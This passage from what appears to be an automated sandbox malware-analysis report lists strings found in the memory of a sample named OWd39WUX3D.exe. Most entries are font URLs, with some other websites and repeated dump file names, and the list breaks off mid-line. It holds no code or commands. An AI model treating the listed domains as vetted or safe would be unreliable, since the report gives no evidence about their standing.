00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot?#iefix
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.svg#fontawesome
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.ttf
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff2
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vimeo.com/user202295058
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.11tochi.net/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.GPSENKE.com
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.382180888.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aiag.org/about
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.555400736.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 